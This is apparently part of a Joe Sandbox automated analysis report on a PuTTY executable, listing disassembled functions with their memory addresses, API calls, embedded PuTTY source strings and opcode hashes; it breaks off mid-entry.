                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$count234(term->screen) == newrows$count234(term->scrollback) <= newsavelines$count234(term->scrollback) >= term->tempsblines$sblen >= term->tempsblines$term->rows == count234(term->screen)$term->rows == newrows
                      • API String ID: 0-2137284441
                      • Opcode ID: c27046c877bbe28c414387422ba7976d0ecd375ec3d110cc09af1e6b29d4a1ca
                      • Instruction ID: 8fb76ca7049dbb853b2e2ec14f48d12d66cd118331b60ec56fdd1906d5964cf4
                      • Opcode Fuzzy Hash: c27046c877bbe28c414387422ba7976d0ecd375ec3d110cc09af1e6b29d4a1ca
                      • Instruction Fuzzy Hash: CE621573A2968186E750CF38D4447AE3BA4FB84B54F665235DA5D8B386EF3CE880C744
                      Function 00007FF678692E80 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 329COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: memcpy_s
                      • String ID: $MZx
                      • API String ID: 1502251526-1316729395
                      • Opcode ID: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
                      • Instruction ID: 24dd1fd1fa8556a0daabce3322008024ba797872fd26a92c827b8d9f0cf0833c
                      • Opcode Fuzzy Hash: 680b90cf97a9c7fb76d7a62705229292c2faa968d74e11d542b3937a122fd231
                      • Instruction Fuzzy Hash: 81C10673B2868697D724CF69E148A6ABB91F784784F149139DB4A83B84DF3CEC05DB04
                      Function 00007FF6786232EC Relevance: 9.0, Strings: 7, Instructions: 298COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
                      • API String ID: 0-44983218
                      • Opcode ID: ba424b58cbbb99aae8b14aad6f6064a995736501febaf7f6e00a0bdb9dd836ec
                      • Instruction ID: 22914173de34b22c61c70ac131b6e9173a8ed16e94aa3f465c9726b034de9722
                      • Opcode Fuzzy Hash: ba424b58cbbb99aae8b14aad6f6064a995736501febaf7f6e00a0bdb9dd836ec
                      • Instruction Fuzzy Hash: 09B1F353B3854261FE51EB32A9115BB1B90AF85BC4FA41431ED0ECB796DE3CE842E748
                      Function 00007FF6786B697C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight$InformationTimeZone_invalid_parameter_noinfo
                      • String ID: @
                      • API String ID: 3482513350-2766056989
                      • Opcode ID: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
                      • Instruction ID: 21c3b2f577be21f6e37a817985e7bc1d3ac476d23feff1811f525313e323c970
                      • Opcode Fuzzy Hash: dca634d6c3a5b7d34b55d3a849be1959882c23d7e5e2232627116e95c2f1e3cd
                      • Instruction Fuzzy Hash: 9E518333A2864296E750DF36E8814AA7F61FB48798F644135FA4DC7B96DF3CE8019708
                      Function 00007FF678628E20 Relevance: 7.8, Strings: 6, Instructions: 305COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/sharing.c$Bad packet length %u$Truncated GLOBAL_REQUEST packet$cancel-tcpip-forward$err != NULL$upstream added want_reply flag
                      • API String ID: 0-3127662328
                      • Opcode ID: 991be26201f74181bba88df3678a337c7b480657ca93a9f6299da5e586af8475
                      • Instruction ID: 152b52547d67f70fd611b7b94494411f82f3eb2b013f64a430f28d7fabc4f829
                      • Opcode Fuzzy Hash: 991be26201f74181bba88df3678a337c7b480657ca93a9f6299da5e586af8475
                      • Instruction Fuzzy Hash: 8DE1D223A18A8195EB20DB25E4507ABBBA0FBC8B84F644031DF8E87796DF7CD845D744
                      Function 00007FF67864A9C0 Relevance: 7.8, Strings: 6, Instructions: 288COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/proxy/sshproxy.c$backvt->flags & BACKEND_NOTIFIES_SESSION_START && "Backend provides NC_HOST without SESSION_START!"$false && "bad SSH proxy type"$saved session '%s' is not an SSH session$saved session '%s' is not launchable$unable to open SSH proxy connection: %s
                      • API String ID: 0-1306285275
                      • Opcode ID: 9ef69af328c5a2eb72a18165583f3a624f4cbe1c915d5e5e8a5a22084f012d1b
                      • Instruction ID: 1f35c71d287b54cefe743aa87ed9cf1e51dfdc1c873321fd61181697e81f037e
                      • Opcode Fuzzy Hash: 9ef69af328c5a2eb72a18165583f3a624f4cbe1c915d5e5e8a5a22084f012d1b
                      • Instruction Fuzzy Hash: C5C1A527A2868261EA549B32E4503BF6B51EFC5BD0F604035DF8E87B97DE3CE8419304
                      Function 00007FF678649120 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                      • String ID:
                      • API String ID: 2660700835-0
                      • Opcode ID: e40370b0eb4c02b40ff289f01bc8dc88bbf23639b1323524b1364f8764570233
                      • Instruction ID: 0400c8cf8d2eeed771b1294043881038b566d5cecb4cfc4c890e145ac81b06da
                      • Opcode Fuzzy Hash: e40370b0eb4c02b40ff289f01bc8dc88bbf23639b1323524b1364f8764570233
                      • Instruction Fuzzy Hash: 6D31E333629B8156F7248B35F81466B3B94FB99760F644134CE4E82BA4DF3CE940DB08
                      Function 00007FF6785DB950 Relevance: 7.5, APIs: 5, Instructions: 27clipboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Clipboard$Data$CloseMessageOpenSend
                      • String ID:
                      • API String ID: 2111581930-0
                      • Opcode ID: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
                      • Instruction ID: 68e216f4e729ed05daefe298cf196324e02e2237f197809f8b0001f9f4f1fff5
                      • Opcode Fuzzy Hash: e93e0cf60494fe75f915791a3c77afe7e720d1734b7674f2dfd41008d92a8430
                      • Instruction Fuzzy Hash: 0AF0A712F39563A3FB942B71684877629929F44B40F745038C81EC63D8CD1DED85DB19
                      Function 00007FF6785E4A80 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 527COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$chars != NULL$nchars_used < nchars_got
                      • API String ID: 0-2160977139
                      • Opcode ID: 6bda750f2f829f912fe00ae960369c8f33894d338bf28a3c136aa815d228c365
                      • Instruction ID: 7a554dd968e8b2831cee9df21aaa1b219db2b41773919675100fa729c91bafe3
                      • Opcode Fuzzy Hash: 6bda750f2f829f912fe00ae960369c8f33894d338bf28a3c136aa815d228c365
                      • Instruction Fuzzy Hash: 36320633A2D69589FBA08B35D8487BA3F95EB41784F664135CA5DCB7D1EE3CE8408708
                      Function 00007FF678617AD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                      Download Yara Rule
                      APIs
                      • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617B7B
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF67860DCDB), ref: 00007FF678617BA4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                      • API String ID: 3479602957-1777221902
                      • Opcode ID: 934d5ca9fc914f20fd68ae67c817c39f5743779c9430b7da65df0996f959670f
                      • Instruction ID: c6acc2d7c43c250eefc9d7b58e6b05536e4a06ae44775105005214ba2417cca5
                      • Opcode Fuzzy Hash: 934d5ca9fc914f20fd68ae67c817c39f5743779c9430b7da65df0996f959670f
                      • Instruction Fuzzy Hash: 7B318A22F2C64255EA509B35F4413B76B61EF84744F204131EA8DC779AEF7CEC459B08
                      Function 00007FF678632190 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirstWindow
                      • String ID: Pageant
                      • API String ID: 2475344593-3220706369
                      • Opcode ID: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
                      • Instruction ID: 51fcc44d9c943aca926a894473c38009ed929ee9daa15f7c54740e7374601119
                      • Opcode Fuzzy Hash: 46b9dcd90dc30509f8ce6d4eeb7586a96e96ad226e4fda942849ad5c994bb184
                      • Instruction Fuzzy Hash: 7601A522F2924261FD105B35A8453BB1B505F597A0FA40231CD1D867D5DD2CDCC6A708
                      Function 00007FF67864FE60 Relevance: 6.8, Strings: 5, Instructions: 579COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/crypto/mpint.c$len <= pool->nw$p > 0$x->nw > 0$x->w[0] & 1
                      • API String ID: 1949149715-820863981
                      • Opcode ID: e0b20f5a8d21874f3a97cb2b2b1057c890e0fd874627e0a1142ccee4fd5db7f8
                      • Instruction ID: bf84aef1c43e16ec425a434cf6577be088e1e102817b7f24082c3c32f9f4f6c2
                      • Opcode Fuzzy Hash: e0b20f5a8d21874f3a97cb2b2b1057c890e0fd874627e0a1142ccee4fd5db7f8
                      • Instruction Fuzzy Hash: B932D232B28B9591DA20DF25E4403AA7764FB84BE4F544232DAAD43BD9EF3CD581D704
                      Function 00007FF6785DA01E Relevance: 6.2, APIs: 4, Instructions: 216COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
                      • Instruction ID: effce4c54e521fe6708d0aa09ca98384bbbbe443b6249cfb2ef9837a6ee710fd
                      • Opcode Fuzzy Hash: 062e9b49704ff532ccb08a301ad4696c212a399bcaca2ce98464616b989bc9b3
                      • Instruction Fuzzy Hash: 3E812627E2C62586FB758B26A8C037A7A92BB94781F304035DD4EC3794DE7CED40AA54
                      Function 00007FF6785DA032 Relevance: 6.2, APIs: 4, Instructions: 214COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
                      • Instruction ID: aad9547ea6106e16ea43ec0ff5057ed3b071bf885c46a77f6dcc575993286631
                      • Opcode Fuzzy Hash: a8f5b5b0e585cb72b3f3f779b8361df6a7e167cc07a1f26b4896fd50d5f44db0
                      • Instruction Fuzzy Hash: AA812727E2C62586FB658B2AA8C037A7A92BB94781F304035DD4DC3794DE7CED409A54
                      Function 00007FF6785DA03E Relevance: 6.2, APIs: 4, Instructions: 214COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Color$ModeObjectSelectText
                      • String ID:
                      • API String ID: 3594386986-0
                      • Opcode ID: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
                      • Instruction ID: e3ca80d581a85d02eaa40d4fe496eec6d32c25ffb714dc6c6cb2dda2b873313a
                      • Opcode Fuzzy Hash: 7965013e65fe39ea2ae5d9b7d588d824beffc7c579ab59e583ffeacae1a9d986
                      • Instruction Fuzzy Hash: F1812737E2C62586FB658B26A88037A7A92FB94781F304035DD4DC3794DE7CED409B54
                      Function 00007FF6786AF964 Relevance: 5.5, APIs: 3, Instructions: 1005COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight$_invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 1286766494-0
                      • Opcode ID: 1eb53fdb1f7e85100b90bf35bdf4ec4e651609bdb89da2f09d3bd1ddb09729b4
                      • Instruction ID: 02061946951f237fb74623b7b9d27d120aff392e00c0518f791fff46f9a3c1fd
                      • Opcode Fuzzy Hash: 1eb53fdb1f7e85100b90bf35bdf4ec4e651609bdb89da2f09d3bd1ddb09729b4
                      • Instruction Fuzzy Hash: 6B92D233A28652D6E7249F35D45017B2FA5FB45788F244036EB8987A95DF3DED00E30A
                      Function 00007FF6786179B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
